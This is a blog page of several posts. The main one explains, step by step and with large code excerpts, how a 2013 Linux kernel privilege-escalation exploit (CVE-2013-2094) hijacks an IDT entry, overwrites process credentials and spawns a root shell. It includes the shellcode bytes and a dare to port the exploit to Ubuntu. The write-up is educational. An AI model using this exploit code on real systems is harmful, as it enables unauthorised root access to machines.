time to bleed by Joe Damato

technical ramblings from a wanna-be unix dinosaur

Introducing packagecloud.io

View Comments

packagecloud.io: package repository hosting as a service

I’ve taken a bit of a break from blogging over the past several months in order to focus on a product I’m building with my friend James that helps to solve a set of problems we’ve both suffered through many times before:

Setting up, managing, securing, and dealing with package repositories that support multiple architectures and linux distributions is painful, time consuming, and error-prone.

public launch

We are publicly launching packagecloud.io for the first time today to help ease the pain for hobbyists, devs, and ops people who need to host RPM, DEB, or RubyGem repositories for their personal projects, build systems, and internal infrastructure.

features

Some of the most exciting features for our initial launch include:

  • GPG signing of repositories
  • All repositories are served over HTTPS
  • Support for multiple Linux distributions in a single repository
  • Private repositories
  • Install scripts to get your repositories up and running quickly and easily

sign up and stay tuned

Sign up today and stay tuned for more to come soon

Written by Joe Damato

April 14th, 2014 at 6:53 am

Posted in linux,systems

Available for consulting projects

View Comments

I am happy to announce that I have launched my consulting company: Sassano Systems and am now available for consulting projects.

If you have something that is slow, acting weird, or needs to be redesigned I can help.

My specialties are systems programming, debugging, and performance analysis. I build, maintain, and refactor anything written in C. I find and fix extremely elusive bugs in kernels, drivers, and system libraries. I tweak applications, operating systems, and drivers to get better performance.

Previous work

I’ve worked on a wide range of projects from unraveling and understanding recent Linux kernel exploits, to maintaining and extending widely used tracing tools, and even writing drivers to help test networking code. I’ve diagnosed tricky bugs in the Ruby MRI 1.8 virtual machine. I wrote a Ruby MRI 1.8 memory profiler that works by rewriting the Ruby virtual machine while it is running.

I’ve given talks in the US and internationally about some of the weird things I’ve seen inside of computers.

Specialities

  • C, x86 assembly, x86_64 assembly
  • Performance analysis, debugging
  • Kernels, drivers, debuggers, linkers, loaders, boot loaders
  • Build toolchains, cross platform build systems

Contact

To get more information about my rates or how I can help, check out my website at: http://sassanosystems.com.

Written by Joe Damato

June 10th, 2013 at 12:10 am

A closer look at a recent privilege escalation bug in Linux (CVE-2013-2094)

View Comments


If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.

tl;dr

This article is going to explain how a recent privilege escalation exploit for the Linux kernel works. This exploit affects CentOS 5 and 6 as well as other Linux distributions. Linux kernel version 2.6.37 to 3.8.9 are affected by this exploit. I will explain this exploit from the kernel side and the userland side to help readers get a better understanding of how exactly it works.

I did not write the original exploit and I did not discover this vulnerability. Full credit goes to the original author of the exploit. I don’t do computer security in any professional capacity, but I do think unraveling exploits is fun and interesting.

First, let’s start with some helpful background information about a few different things and then I’ll tie them all together at the end to walk through the exploit itself.

mmap and MAP_FIXED

mmap seems to come up quite a bit in my blog posts. If you’ve never used it before, it is a system call that allows you to map regions of memory into your process’ address space.

mmap can take a wide variety of flags. One useful flag is MAP_FIXED. This flag allows you to ask mmap to create a region of memory in your process’ address space starting at a specific address. Of course, this request may fail if another mapping is already present at the address you specify.

The syscall wrapper function

Not every system call supported by the Linux kernel has a corresponding wrapper function in glibc (or other library). There are many reasons why this can happen. Sometimes, a new version of a Linux distribution is cut before glibc has been updated to support the new kernel interface. Other times, the glibc team decides for whatever reason that a particular kernel feature will not have a corresponding userland wrapper function exposed.

If you need to call a particular system call for which no wrapper exists in glibc, you can use the generic function syscall.

syscall works by allowing the programmer to pass in an arbitrary syscall number and an arbitrary set of arguments that will get passed over to the kernel. Sometimes, you can find a symbolic constant for the syscall number of the syscall you’d like to call in the unistd.h file for your system architecture.

On 64-bit CentOS 6, the header file /usr/include/asm/unistd_64.h contains lots of useful symbolic constants. For example, the constant for the syscall number for getpid looks something like this:

#define __NR_getpid          39

Interrupt Descriptor Table and sidt

I’ve written about the interrupt descriptor table (IDT) a few times before, but all you really need to know is that the IDT is essentially an array of structures that the CPU uses to determine what action to take when an exception or interrupt is raised on the system.

A register called the IDTR on x86 and x86_64 processors stores a structure which describes the length and starting address of the IDT. The format of the data in this register when the CPU is in 64-bit mode can be represented by the following packed structure in C:

/* 64bit IDTR structure */
struct {
  uint16_t limit;
  uint64_t addr;
} __attribute__((packed)) idtr;

The value of this register can be stored or loaded with the sidt and lidt instructions, respectively.

The instruction to load a value into the IDTR, lidt, may only be executed by privileged code (in our case, this means kernel code).

The instruction to store the value in the IDTR, sidt may be executed by unprivileged code (in our case, this means userland).

The entries in the IDT array have the following format when the CPU is in 64-bit mode1 :

Rewriting the semtex exploit to make it a bit more clear

I decided to rearrange the original exploit by adding white space, renaming functions, adding lots of comments, and moving some stuff around. I did this to help make the C code a bit more understandable to a beginner.

You can get the rewritten code from github here.

Linux kernel performance monitoring interface

The Linux kernel provides a set of system calls for performance monitoring. Some of the information about the low level interfaces provided by the kernel can be found here.

In particular, the function perf_event_open can be called by userland code to obtain a file descriptor which allows a program to gather performance information. perf_event_open can eventually call perf_swevent_init which is an internal kernel function that is called when a user program is attempting to initialize a software defined event.

Buggy increment in the kernel

Let’s take a look at the structure definition for the first argument to the perf_event_open function, struct perf_event_attr2:

struct perf_event_attr {
  /*
   * Major type: hardware/software/tracepoint/etc.
   */
  __u32                   type;

  /*
   * Size of the attr structure, for fwd/bwd compat.
   */
  __u32                   size;

  /*
   * Type specific configuration information.
   */
  __u64                   config;

  /* ... */

Notice that the field config is defined as a 64-bit unsigned integer.

Now let’s take a look at how perf_swevent_init uses the config field:

static int perf_swevent_init(struct perf_event *event)
{
  int event_id = event->attr.config;
 
  /* ... */
 
  if (event_id >= PERF_COUNT_SW_MAX)
    return -ENOENT;

  /* ... */
  
  atomic_inc(&perf_swevent_enabled[event_id]);

  /* ... */

This looks bad because the unsigned 64-bit config field is being cast to a signed 32-bit integer. That value is then used as an index to an array called perf_swevent_enabled.

And, so:

  1. The user supplies a value for config which has (at least) the 31st bit set to 1.
  2. This value is truncated to 32-bits and stored as event_id.
  3. The if statement checks event_id against PERF_COUNT_SW_MAX (which is 9 on CentOS 6 kernel 2.6.32-358.el6.x86_64) to ensure that event_id is less than PERF_COUNT_SW_MAX. Any negative number will be, so execution continues.
  4. The value in event_id is sign extended to 64-bits and then used as an offset into the perf_swevent_enabled array.
  5. Thus, any value interpreted as negative from event_id will cause the kernel to call atomic_inc on a memory address that a user program can control.

Buggy decrement in the kernel

Let’s now examine the code which is executed when the file descriptor is closed:

static void sw_perf_event_destroy(struct perf_event *event)
{
  u64 event_id = event->attr.config;

  /* ... */
 
  atomic_dec(&perf_swevent_enabled[event_id]);

  /* ... */

This code is interesting because here the value in config is stored as an unsigned 64-bit value and used as an index into perf_swevent_enabled. This code path assumes that the open code path examined above will reject anyone with a config value that is too large.

However, as we saw above, if the user had successfully called perf_event_open with a large 64-bit unsigned value (which was interpreted as a 32-bit negative number) then the close code path will incorrectly offset from the perf_swevent_enabled with a large 64-bit unsigned value.

This allows a user program to cause the kernel to decrement an address that the userland program can control.

Exploit summary

Before I dig into the exploit, let’s take a step back and summarize what this exploit will do:

  • An initial memory region is allocated with mmap and MAP_FIXED and is used to determine where buggy increments and decrements will land when offset fromperf_swevent_enabled.
  • A memory region is allocated where a NOP sled, a small piece of shellcode, and the malicious C code is copied.
  • The malicious code is rewritten at runtime to fill in values for the process’ uid and gid as well as the address of the upper 32-bits of the IDT handler for interrupt 4.
  • The upper 32-bits of IDT handler for interrupt 4 are incremented by crafting a precise value for perf_event_open.
  • Interrupt 4 is triggered which executes the shell code and malicious code. The malicious code overwrites the uids and gids as well as the capability sets for the current process.
  • Once the interrupt handler returns and the exploit continues, it calls setuid to become root and then executes a bash shell as root.
  • Crazy shit.

Exploit

The exploit will use these buggy increment and decrement paths to force the kernel to eventually transfer execution to a known userland address that contains malicious code which elevates the credentials of the process allowing it to execute a shell as root.

A wrapper function for calling perf_event_open

The exploit contains a function called sheep which uses syscall (as described above) to call perf_event_open. I’ve renamed sheep in my rewrite to break_perf_event_open and rearranged the code to look like this:

static void
break_perf_event_open (uint32_t off) {

  struct perf_event_attr pea = {
    .type   = PERF_TYPE_SOFTWARE,
    .size   = sizeof(struct perf_event_attr),
    .config = off,
    .mmap   = 1,
    .freq   = 1,
  };
                                                                                                                                                                  
  /*
   * there is no wrapper for perf_event_open in glibc (on CentOS 6, at least),
   * so you need to use syscall(2) to call it.
   *
   * I copied the arguments out of the kernel (with the kernel explanation of
   * some of them) here for convenience.
   */
  int fd = syscall(__NR_perf_event_open,
                  &pea,   /* struct perf_event_attr __user *attr_uptr       */
                     0,   /* pid_t              pid       (target pid)      */
                    -1,   /* int                cpu       (target cpu)      */
                    -1,   /* int                group_fd  (group leader fd) */
                    0);   /* unsigned long      flags                       */

  if (fd < 0) {
          perror("perf_event_open");
          exit(EXIT_FAILURE);
  }

  if (close(fd) != 0) {
          perror("close");
          exit(EXIT_FAILURE);
  }

  return;
}

Setting up an initial memory region with mmap

map = mmap((void *) 0x380000000, 0x010000000,
                PROT_READ | PROT_WRITE,
                MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE,
                -1,
                0);

The exploit begins by first creation a memory region with mmap at the address 0x380000000 for a length of 0x010000000 bytes (256 MB).

The address 0x380000000 was chosen because:

  • The address of the perf_swevent_enabled array is 0xffffffff81f360c0.
  • If the user passes -1 as config then the offset into the array in the close path will be: 0xffffffffffffffff * 4 (multiply by 4 we are doing pointer arithmetic on an array of ints).
  • Thus, a decrement will be performed at the address: 0x0000000381f360bc for a config value of -1.
  • Similarly, a decrement will be performed at the address: 0x0000000381f360b8 for a config value of -2.

Thus, a region starting at 0x380000000 and extending until 0x390000000 will contain the address that the kernel will write to when decrementing the -1 and -2 offsets of perf_swevent_enabled.

The exploit then fills this memory region with 0s and calls a function called sheep in the original exploit (aka break_perf_event_open in my rewrite):

  memset(map, 0, SIZE);

  break_perf_event_open(-1);
  break_perf_event_open(-2);

After the above exploit code executes an increment and decrement are performed in the kernel. The decrement lands somewhere on in the memory region allocated above.

Find the offset into the memory region where the write occurred

The exploit continues by iterating over the memory region to find where the decrement landed:

/* this for loop corresponds with lines 66-69 of the original exploit */

for (i = 0; i < SIZE/4; i++) {                                                                                                                             
  uint32_t *tmp = map + i;
  /* 
   * check if map[i] (aka tmp) is non zero.
   * also check if map[i+1] (aka tmp+1) is non zero.
   *
   * if both are non zero that means our calls above
   * break_perf_event_open(-1) and break_perf_event_open(-2) have
   * scribbled over memory this process allocated with mmap.
   */
  if (*tmp && *(tmp + 1)) {
          break;
  }
}

Retrieving the value of the IDTR and creating another memory region

The exploit continues by:

  • Retrieving the value stored in the IDTR with sidt
  • Masking the upper 32 bits and the lower 24 bits of the 64-bit IDT base address away
  • Allocating a memory region starting at the adjusted address
  /* this instruction and the subsequent mask correspond to lines 71-72 in
   * the original exploit.
   */
  asm volatile ("sidt %0" : "=m" (idt));
  kbase = idt.addr & 0xff000000;
  
  /* allocate KSIZE bytes at address kbase */
  code = mmap((void *) kbase, KSIZE,
                  PROT_READ | PROT_WRITE | PROT_EXEC,
                  MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE,
                  -1,
                  0);

This is the memory region to which the kernel will transfer control. I will explain soon how execution will be transferred to this address and why the 0xff000000 bitmask was applied.

Preparing the target memory region

The exploit now prepares the memory region:

  • The memory region is filled with the value 0x90 which is the opcode for the NOP instruction (See the wikipedia page about the NOP sled for more information).
  • The malicious code from the function fuck (renamed to fix_idt_and_overwrite_creds) is copied into the memory region after a healthy sized NOP sled.
  • A small shellcode stub (that we will examine shortly) is prepared and copied into the memory region just before the malicious code.
  /*
   * fill the region of memory we just mapped with 0x90 which is the x86
   * NOP instruction.
   */
  memset(code, 0x90, KSIZE);

  /* move the code pointer up to the start of the last 1024 bytes of the                                                                                     
   * mapped region.
   *
   * this leaves (32 megabytes - 1024 bytes) of NOP instructions in
   * memory.
   */
  code += (KSIZE-1024);

  /* copy the code for the function above to the memory region */
  memcpy(code, &fix_idt_and_overwrite_creds, 1024);

  /* copy our shell code just before the code above */
  memcpy(code - shellcode_sz, shellcode, shellcode_sz);

A closer look at the malicious code

Before we can examine the rest of the exploit, we'll first need to understand the malicious code that is copied into the memory region.

The malicious code, originally called fuck, but renamed to fix_idt_and_overwrite_creds has a few goals:

  • Restore as much of the overwritten kernel data as possible or at least enough for the kernel to continue (mostly) working.
  • Find the kernel data structure that lives at the start of the kernel stack. This is a struct thread_info.
  • Find the pointer in struct thread_info to the current struct task_struct. This should be easy once the struct thread_info is located, as it is the first field in struct thread_info.
  • Find the struct cred pointer in the current struct task_struct.
  • Overwrite the various uids and gids as well as the kernel_cap_t fields.

The original exploit code for this is a bit painful to read. In my rewritten exploit I added a lot of comments to the code to help explain how each of these goals is accomplished.

Take a look at the code here.

Cleaning up after itself

One of the first things that fuck (aka fix_idt_and_overwrite_creds) does is fix the upper 32-bits of the IDT handler offset for software interrupt 4, by doing this:

/* This marker will eventually be replaced by the address of the upper 32-bits
 * of the IDT handler address we are overwiting.
 *
 * Thus, the write on the following line to -1 will restore the original value
 * of the IDT entry which we will overwrite 
 */
uint32_t *fixptr = (void*) GENERATE_MARKER(1);
*fixptr = -1;

Locating the uids and gids

The most interesting part of this malicious code (for me, at least) is how exactly it locates the uids and gids that need to be overwritten.

You'll notice that in the main function of the exploit, the exploit has the following code:

/* get the current userid and groupids */
u = getuid();
g = getgid();

/* set all user ids and group ids to be the same, this will help find this
 * process' credential structure later.
 */
setresuid(u, u, u);
setresgid(g, g, g);

This code ensures that all the uids and gids are set to the current uid and gid. This is done so that the malicious code that executes later can search memory for a sequence of uids and gids and "know" that it has found the right place to begin overwriting data.

Another interesting thing to note about the malicious code is that it gets modified at runtime after it has been copied to the memory region described above.

Rewriting parts of the malicious code at runtime

The malicious code needs to be overwritten at runtime after it has been copied to the memory region to which control will be transfered for two main reasons:

  1. At compile time the process' uid and gid may not be known.
  2. At compile time the address of any overwritten kernel state my not be known. As we will soon see, this overwritten state is part of the IDT handler offset for a particular software interrupt.

In order to accomplish these goals, you will notice that the fuck function (or fix_idt_and_overwrite_creds) has a series of "markers" in place:

  /* create a few markers which will be filled in with the
   * ((group id << 32) | user id) later by the exploit.
   */
  uint64_t uids[4] = {	GENERATE_MARKER(2),
			GENERATE_MARKER(3),
			GENERATE_MARKER(4),
			GENERATE_MARKER(5)
  };
  
  /* ... */

  uint32_t *fixptr = (void*) GENERATE_MARKER(1);

These values are simply unique enough bit patterns that can be located later and overwritten.

The main function of the exploit takes care of that by doing this:

for (j = 5; j > 0; j--) {
  /* generate marker values */
  needle = GENERATE_MARKER(j);
  
  /* find marker values in the malicious code copied to our memory
   * region
   */
  p = memmem(code, 1024, &needle, 8);
  if (!p) {
      fprintf(stderr, "couldn't find the marker values (this is"
                      "bad)\n");
      break;
  }
  
  if (j > 1) {
    /* marker values [2 - 5] will be replaced with the uid/gid of this process */
    *p = ((g << 32) | u);
  } else {                                                                                                                                                      
    /* marker value 1 will be replaced with the offset of the IDT handler we will
     * highjack. this address will be used to restore the overwritten state later.
     */
    *p = idt.addr + 0x48;
  }
}

Incrementing the address of an IDT handler

Now, everything is in place. It is time for the exploit to connect all the pieces together before triggering the malicious code and executing a root shell.

The last piece of the puzzle was pretty interesting for me as this was my first time seeing this attack vector, but after I understood what was happening and did some googling I located a phrack article from 2007 that explains this attack vector.

This exploit works by incrementing the upper 32-bits of a 64-bit IDT entry's handler offset (check the screenshot from the Intel manual above). The IDT entry for the overflow exception was chosen, software interrupt 4, because it is not particularly important and can be temporarily "borrowed" by this exploit.

Since the overflow exception's handler is located in kernel memory, the upper 32-bits of the 64-bit handler offset are 0xffffffff. Incrementing 0xffffffff causes an overflow to 0x00000000 and thus the 64-bit IDT handler's offset goes from 0xffffffff[lower 32bits] to 0x00000000[lower 32bits].

Or in other words, changing the top 32-bits of the address to 0 changes the address from a location in kernel memory to a location that can be mapped with mmap and MAP_FIXED.

This is why the IDT's base address was masked earlier in the exploit like this:

/*
 * the "sidt" instruction retrieves the base Interrupt Descriptor Table 
 *
 * this instruction and the subsequent mask correspond to lines 71-72 in
 * the original exploit.
 */

asm volatile ("sidt %0" : "=m" (idt));
kbase = idt.addr & 0xff000000;

The actual increment happens when the following code executes:

break_perf_event_open(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);

This code is just doing some tricky arithmetic to calculate the value that must be passed to the buggy kernel increment path in order to increment the upper 32-bits of the 64-bit IDT handler for software interrupt 4

Triggering the exploit

Now that everything is hooked in, triggering the exploit is simple:

/*
 * trigger the highjacked interrupt handler
 */
asm volatile("int $0x4");

This raises the interrupt causing the CPU to transfer control to the (modified) IDT handler address which is actually just the memory region we created above and copied NOPs, shellcode, and malicious C code into.

After the NOPs execute, the shellcode executes:

static char shellcode[] = "\x0f\x01\xf8"       /*  swapgs                    */
                          "\xe8\x05\x0\x0\x0"  /*  callq    
                                                *  (this callq transfers
                                                *  exeuction to after this piece
                                                *  of shell code where the
                                                *  fix_idt_and_overwrite_creds
                                                *  function will live
                                                */
                          "\x0f\x01\xf8"       /*  swapgs                    */
                          "\x48\xcf";          /*  iretq$                    */

This shell code:

  • Swaps in a stored value for the GS register, which the kernel needs for accessing internal data.
  • Transfers control to our malicious C code (fuck, aka fix_idt_and_overwrite_creds).
  • After the malicious C code returns, the shellcode continues by swapping the GS register back out.
  • And finally, it returns to userland with iret.

Dat root shell

After the above code executes, the malicious code has been triggered, the uid and gid of the process as well as the capability set have been overwritten. The process can now change its uid to root and execute a shell as root:

/*
 * at this point we should be able to set the userid of this process to
 * 0.
 */
if (setuid(0) != 0) {
  perror("setuid");
  exit(EXIT_FAILURE);
}

/*
 * launch bash as uid 0
 */
return execl("/bin/bash", "-sh", NULL);

Easily one of the most insane exploits I've seen, but that isn't saying much since I don't look at exploits all that often.

Exercise for the reader

Now that you know how this exploit works, go make it work on a 64-bit Ubuntu. No, seriously, do it.

Conclusion

  • Dealing with integers in C code is tricky. Be careful and get people to review your code.
  • Hijacking IDT entries to scan kernel memory to find and overwrite kernel data structures to elevate privileges of a user process so it can then execute a bash shell as root is pretty nuts.
  • MAP_FIXED is actually much more useful than I had previously imagined.
  • Hijacking IDT entries to scan kernel memory to find and overwrite kernel data structures to elevate privileges of a user process so it can then execute a bash shell as root is pretty nuts.
  • Reading exploit code is fun and interesting. You should do it more often than you probably do right now.
  • I'm tired from writing this much.

If you enjoyed this article, subscribe (via RSS or e-mail) and follow me on twitter.

References

  1. Intel® 64 and IA-32 Architectures Software Developer’s Manual Volume 3A: System Programming Guide, Part 1, 5.1: Interrupt and Exception Overview []
  2. /usr/include/linux/perf_event.h line 198 []

Written by Joe Damato

May 20th, 2013 at 10:29 pm

Digging out the craziest bug you never heard about from 2008: a linux threading regression

View Comments


If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.

tl;dr

This blog post will show how a fix for XFree86 and linuxthreads ended up causing a major threading regression about 7 years after the fix was created.

The regression was in pthread_create. Thread creation performed very slowly as the number of threads in a process increased. This bug is present on CentOS 5.3 (and earlier) and other linux distros as well.

It is also very possible that this bug impacted research done before August 15, 2008 (in the best case because Linux distro releases are slow) on building high performance threaded applications.

Digging this thing out was definitely one of the more interesting bug hunts in recent memory.

Hopefully, my long (and insane) story will encourage you to thoroughly investigate suspicious sources of performance degradation before applying the “[thing] is slow” label.

[thing] might be slow, but it may be useful to understand why.

Versions

This blog post will be talking about:

  • glibc 2.7. Earlier versions are probably affected, but you will need to go look and see for sure.
  • Linux kernels earlier than 2.6.27. Some linux distributions will backport fixes, so it is possible you could be running an earlier kernel version, but without the bug described below. You will need to go look and see for sure.

Linux’s mmap and MAP_32BIT

mmap is a system call that a program can use to map regions of memory into its address space. mmap can be used to map files into RAM and to share these mappings with other processes. mmap is also used by memory allocators to obtain large regions of memory that can be carved up and handed out to a program.

On June 29, 2001, Andi Kleen added a flag to Linux’s mmap called MAP_32BIT. This commit message reads in part1:

This adds a new mmap flag to force mappings into the low 32bit address space.
Useful e.g. for XFree86′s ELF loader or linuxthreads’ thread local
data structures.

As Kleen mentions, XFree86 has its own ELF loader that appears to have been released as part of the 4.0.1 release back in 2000. The purpose of this ELF loader is to allow loadable module support for XFree86 even on systems that don’t necessarily have support for loadable modules. Another interesting side effect of the decision to include an ELF loader is that loadable modules can be built once and then reused on any system that XFree86 supports without recompiling the module source.

It appears that Kleen added MAP_32BIT to allow programs (like XFree86) which assumed mmap would always return 32-bit addresses to continue to work properly as 64-bit processors were beginning to enter the market.

Then, on November 11, 2002, Egbert Eich added some code to XFree86 to actually use the MAP_32BIT flag, the commit message says:

532. Fixed module loader to map memory in the low 32bit address space on
x86-64 (Egbert Eich).

Thus, 64-bit XFree86 builds would now have a working ELF loader since those builds would be able to get memory with 32-bit addresses.

I will touch on the threading implications mentioned in Kleen’s commit message a bit later.

ELF small code execution model and a tweak to MAP_32BIT

The AMD64 ABI lists several different code models which differ in addressing, code size, data size, and address range.

Specifically, the spec defines something called the small code model.

The small code model is defined such that that all symbols are known to be located in the range from 0 to 0x7EFFFFFF (among other things that are way beyond the scope of this blogpost).

In order to support this code execution model, Kleen added a small tweak to MAP_32BIT to limit the range of addresses that mmap would return in order to support the small code execution model.

Unfortunately, I have not been able to track down the exact commit with Kleen’s commit message (if there was one), but it occurred sometime between November 28, 2002 (kernel 2.4.20) and June 13, 2003 (kernel 2.4.21).

I did find what looks like a merge commit or something. It shows the code Kleen added and a useful comment explaining why the address range was being limited:

+	} else if (flags & MAP_32BIT) { 
+		/* This is usually used needed to map code in small
+		   model: it needs to be in the first 31bit. Limit it
+		   to that.  This means we need to move the unmapped
+		   base down for this case.  This may give conflicts
+		   with the heap, but we assume that malloc falls back
+		   to mmap. Give it 1GB of playground for now. -AK */ 
+		if (!addr) 
+			addr = 0x40000000; 
+		end = 0x80000000;		

Unfortunately, now the flag’s name MAP_32BIT is inaccurate.

The range has been limited to a single gigabyte from 0x40000000 (1gb) – 0x80000000 (2gb). This is good enough for the ELF small code model mentioned above, but this means any memory successfully mapped with MAP_32BIT is actually mapped within the first 31 bits and thus this flag should probably be called MAP_31BIT or something else that more accurately describes its behavior.

Oops.

pthread_create and thread stacks

When you create a thread using pthread_create there are two ways to allocate a region of memory for that thread to use as its stack:

  • Allow libpthread to allocate the stack itself. You do this by simply calling pthread_create. This is the common case for most programs. Use pthread_attr_getstacksize and pthread_attr_setstacksize to get and set the stack size.

or

  • A three step process:

    1. Allocate a region of memory possibly with mmap, malloc (which may just call mmap for large allocations), or statically.
    2. Use pthread_attr_setstack to set the address and size of the stack in a pthread attribute object.
    3. Pass said attribute object along to pthread_create and the thread which is created will have your memory region set as its stack.

Slow context switches, glibc, thread local storage, … wow …

A lot of really crazy shit happened in 2003, so I will try my best to split into digestible chunks.

Slow context switching on AMD k8

On February 12, 2003, it was reported that early AMD P4 CPUs were very slow when executing the wrmsr instruction. This instruction is used to write to model specific registers (MSRs). This instruction was used a few times in context switch code and removing it would help speed up context switch time. This code was refactored, but the data gathered here would be used as a justification for using MAP_32BIT in glibc a few months later.

MAP_32BIT being introduced to glibc

On March 4, 2003, it appears that Ulrich Drepper added code to glibc to use the MAP_32BIT flag in glibc. As far as I can tell, this was the first time MAP_32BIT was introduced to glibc2 .

An interesting comment is presented with a small piece of the patch:

+/* For Linux/x86-64 we have one extra requirement: the stack must be
+   in the first 4GB.  Otherwise the segment register base address is
+   not wide enough.  */
+#define EXTRA_PARAM_CHECKS \
+  if ((uintptr_t) stackaddr > 0x100000000ul                                  \
+      || (uintptr_t) stackaddr + stacksize > 0x100000000ul)                  \
+    /* We cannot handle that stack address.  */                                      \
+    return EINVAL

To understand this comment it is important to understand how Linux deals with thread local storage.

Briefly,

  • Each thread has a thread control block (TCB) that contains various internal information that nptl needs, including some data that can be used to access thread local storage.
  • The TCB is written to the start of the thread stack by nptl.
  • The address of the TCB (and thus the thread stack) needs to be stored in such a way that nptl, code generated by gcc, and the kernel can access the thread control block of the currently running thread. In other words, it needs to be context switch friendly.
  • The register set of Intel processors is saved and restored each time a context switch occurs.
  • Saving the address of the TCB in a register would be ideal.

x86 and x86_64 processors are notorious for not having many registers available, however Linux does not use the FS and GS segment selectors for segmentation. So, the address of the TCB can be stored in FS or GS if it will fit.

Unfortunately, the segment selectors FS and GS can only store 32-bit addresses and this is why Ulrich added the above code. Addresses above 4gb could not be stored in FS or GS.

It appears that this comment is correct for all of the Linux 2.4 series kernels and all Linux 2.5 kernels less than 2.5.65. On these kernel versions, only the segment selector is used for storing the thread stack address and as a result no thread stack above 4gb can be stored.

32-bit and 64-bit thread stacks

Starting with Linux 2.5.65 (and more practically, Linux 2.6.0), support for both 32-bit and 64-bit thread stacks had made its way into the kernel. 32-bit thread stacks would be stored in a segment selector while 64-bit thread stack addresses would be stored in a model specific register (MSR).

Unfortunately, as was reported back in February 12, 2003, writing to MSRs is painfully slow on early AMD K8 processors. To avoid writing to an MSR, you would need to supply a 32-bit thread stack address, and thus Ulrich added the following code to glibc on May 9, 2003:

+/* We prefer to have the stack allocated in the low 4GB since this
+   allows faster context switches.  */
+#define ARCH_MAP_FLAGS MAP_32BIT
+
+/* If it is not possible to allocate memory there retry without that
+   flag.  */
+#define ARCH_RETRY_MMAP(size) \
+  mmap (NULL, size, PROT_READ | PROT_WRITE | PROT_EXEC,                              \
+       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0)
+
+

This code is interesting for two reasons:

  1. The justification for using MAP_32BIT has changed from the kernel not supporting addresses above 4gb to decreasing context switch cost.
  2. A retry mechanism is added so that if no memory is available when using MAP_32BIT, a thread stack will be allocated somewhere else.

At some unknown (by me) point in 2003, MAP_32BIT had been sterilized as explained earlier to deal with the ELF small code model in the AMD64 ABI.

The end result being that user programs have only 1gb of space with which to allocate all their thread stacks (or other low memory requested with MAP_32BIT).

This seems bad.

Fast forward to 2008: an bug

On August 13, 2008 an individual named “Pardo” from Google posted a message to the Linux kernel mailing list about a regression in pthread_create:

mmap() is slow on MAP_32BIT allocation failure, sometimes causing
NPTL’s pthread_create() to run about three orders of magnitude slower.
As example, in one case creating new threads goes from about 35,000
cycles up to about 25,000,000 cycles — which is under 100 threads per
second.

Pardo had filled the 1gb region that MAP_32BIT tries to use for thread stacks causing glibc to fallback to the retry mechanism that Drepper added back in 2003.

Unfortunately, the failing mmap call with MAP_32BIT was doing a linear fucking search of all the “low address space” memory regions trying to find a fit before falling back and calling mmap a second time without MAP_32BIT.

And so after a few thousand threads, every new pthread_create call would trigger two system calls, the first of which would do a linear search of low memory before failing. The linear search and retry dramatically increased the time to create new threads.

This is pretty bad.

bugfixes for the kernel and glibc

So, how does glibc and the kernel fix this problem?

Ingo Molnar convinced everyone that the best solution was to add a new flag to the Linux kernel called MAP_STACK. This flag would be defined as “give out an address that is best suited for process/thread stacks”. This flag would actually be ignored by the kernel. This change appeared in Linux kernel 2.6.27 and was added on August 13, 2008.

Ulrich Drepper updated glibc to use MAP_STACK instead of MAP_32BIT and he removed the retry mechanism he added in 2003 since MAP_STACK should always succeed if there is any memory available. This change was added on August 15, 2008.

MAP_32BIT cannot be removed from the kernel, unfortunately because there are many programs out in the wild (older versions of glibc, Xfree86, older versions of ocamlc) that rely on this flag existing to actually work.

And so, MAP_32BIT will remain. A misnamed, strange looking wart that will probably be around forever to remind us that computers are hard.

Bad research (or not)?

I recall reading a paper that benchmarked thread creation time from back in the 2005-2008 time period which claimed that as the number of threads increased the time to create new threads also increased and thus, threads were bad.

I can’t seem to find that paper and it is currently 3:51 AM PST, so, who knows I could be misremembering things. If some one knows what paper I am talking about, please let me know.

If such a paper exists (and I think it does), this blog post explains why thread creation benchmarks would have resulted in really bad looking graphs.

Conclusion

I really don’t even know what to say, but:

  • Computers are hard
  • Ripping the face off of bugs like this is actually pretty fun
  • Be careful when adding linear time searches to potential hot paths
  • Make sure to carefully read and consider the effects of low level code
  • Git is your friend and you should use it to find data about things from years long gone
  • Any complicated application, kernel, or whatever will have a large number of ugly scars and warts that cannot be changed to maintain backward compatibility. Such is life.

If you enjoyed this article, subscribe (via RSS or e-mail) and follow me on twitter.

References

  1. http://web.archiveorange.com/archive/v/iv9U0zrDmBRAagTHyhHz []
  2. The sha for this change is: 0de28d5c71a3b58857642b3d5d804a790d9f6981 for those who are curious to read more. []

Written by Joe Damato

May 6th, 2013 at 4:13 am

Posted in bugfix,linux

realtalk.io: an podcast for technical discussion

View Comments

James Golick and I have released the inaugural episode of our new, highly technical podcast realtalk.io.

We will be doing frequent technical deep dives and releasing our conversations raw and unedited with all errors, omissions, awkward pauses, and curse words intact.

Check out the website, tune in, and subscribe.

Written by Joe Damato

April 28th, 2013 at 10:23 pm

Posted in Uncategorized